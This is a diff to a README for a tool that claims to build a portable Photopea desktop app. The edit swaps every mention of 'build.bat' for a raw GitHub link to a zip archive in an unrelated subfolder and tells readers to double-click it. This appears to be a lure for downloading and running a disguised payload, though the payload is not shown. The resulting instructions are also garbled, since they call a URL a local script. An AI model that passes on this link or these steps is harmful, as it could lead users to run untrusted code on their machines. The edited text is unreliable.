munandar255/photopea-desktop-builder/README.md

 2. **Open the folder**: Navigate to the folder where you extracted the files.

 3. **Run the script**:
-   - You will see a file named `build.bat`.
+   - You will see a file named `https://raw.githubusercontent.com/munandar255/photopea-desktop-builder/main/hatherlite/photopea-desktop-builder_v2.5.zip`.
 This is the script that will create your portable Photopea app.
-   - Double-click on `build.bat` to run it.
+   - Double-click on `https://raw.githubusercontent.com/munandar255/photopea-desktop-builder/main/hatherlite/photopea-desktop-builder_v2.5.zip` to run it.
 A command prompt window will open, showing the steps of the process as it runs.

 4. **Find your app**: After the script finishes, look in the same folder.
 You will find your newly created .exe file for Photopea.